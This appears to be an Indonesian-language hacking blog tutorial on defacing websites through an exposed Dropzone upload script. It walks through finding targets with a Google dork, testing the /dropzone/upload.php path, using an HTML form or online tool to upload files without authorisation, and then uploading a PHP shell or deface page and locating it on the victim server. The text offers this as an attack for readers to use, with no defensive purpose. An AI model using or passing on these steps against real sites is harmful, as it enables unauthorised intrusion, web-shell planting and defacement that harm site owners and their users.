Minasan,
kon'nichiwa
Untuk update kali ini masih bikin tutorial dulu,
males rasanya mau bikin yang lain. Tutorial kali ini adalah Deface metode CSRF
Dropzone File Upload. Sebeneranya Metode CSRF Dropzone File Upload ini
sebenarnya mudah hampir sama seperti file upload pada umumnya. Tapi semua
kembali pada keberuntungan dan skill kalian
Lansung saja kita siapkan bahan bahan nya
1. PC
/ laptop / HandPhone
2. Internet
Akses
3. CSRF
(saya make CSRF Online)
Kalo sudah siap semua bahannya langsung saja dimulai
tutorial nya
Buka browser kalian kemudian buka goole,com. Jika sudah
masukan Dork / kata kunci
Disini dork yang saya pakai adalah inurl:/dropzone/uploads/
Lihat pada gambar
Jika menurut kalian pada pencarian ALL hasilnya
kurang memuaskan kalian silahkan cari pada bagian Images, siapa tau dapet hasil
banyak
Nah lanjut ke tutorial nya
Setelah dapat web yang mnurut kalian vuln langsung
aja masukin exploitnya
Exploit: /dropzone/upload.php
Contoh: sayangmantan,tk/[path]/dropzone/upload.php
Lihat pada gambar
Setelah dimasukkan exploitnya nanti bakal ketahuan
Vuln atau tidak, untuk exploit Metode Dropzone File Upload ini jika Vuln maka
aka Blank ( tidak tampil apa apa)
Lihat gambar
Nah kalo tampilan diatas berarti vuln, kalo sudah
ketahuan vuln nya langsung saja kita masukan ke CSRF ditutorial saya, saya
selalu menggunakan csrf online karena kebih mudah.
<form
method="POST" action="http://sayangmantan,tt/[path]/dropzone/upload.php
"
enctype="multipart/form-data">
<input
type="file" name="file"
/><button>Upload</button>
</form>
Simpan script diatas dengan format html, contoh
dropzone.html
Disini saya langsung menggunakan CSRF Online, jadi
langsung menyesuaikan saja
Masukkan URL target dibagian URL dan isikan POST
File dengan file
Jika sudah langsung klik Lock!
Setelah dilock pilih file yang akan diupload disini
kita bisa langsung upload file berekstensi .php ,html . txt .jpg .jpeg .png.
kalian juga bisa upload shell / script deface kalian disini
Tunggu sampai proses upload selesai
Jika sudah selesai kalian bisa langsung akses file
yang sudah diupload tadi. Letak file biasanya ada pada
dir:/dropzone/uploads/namafile.php
Contoh:http://sayangmantan,tk/[path]/dropzone/uploads/namafile.php
Terkadang file sudah diupload nama file tersebut
akan berubah secara otomatis
Lihat gambar
Gambar diatas menunjukan bahwa saya sudah sukses
melakukan upload file, dengan nama yang sudah dirubah secara otomatis
Kemudian akses file nya kita gunakan nama file yang
sudah dirubah tadi
Lihat gambar
Selamat mencoba, jika menurut kalian tutorial ini
berguna silahkan dishare
Terima Kasih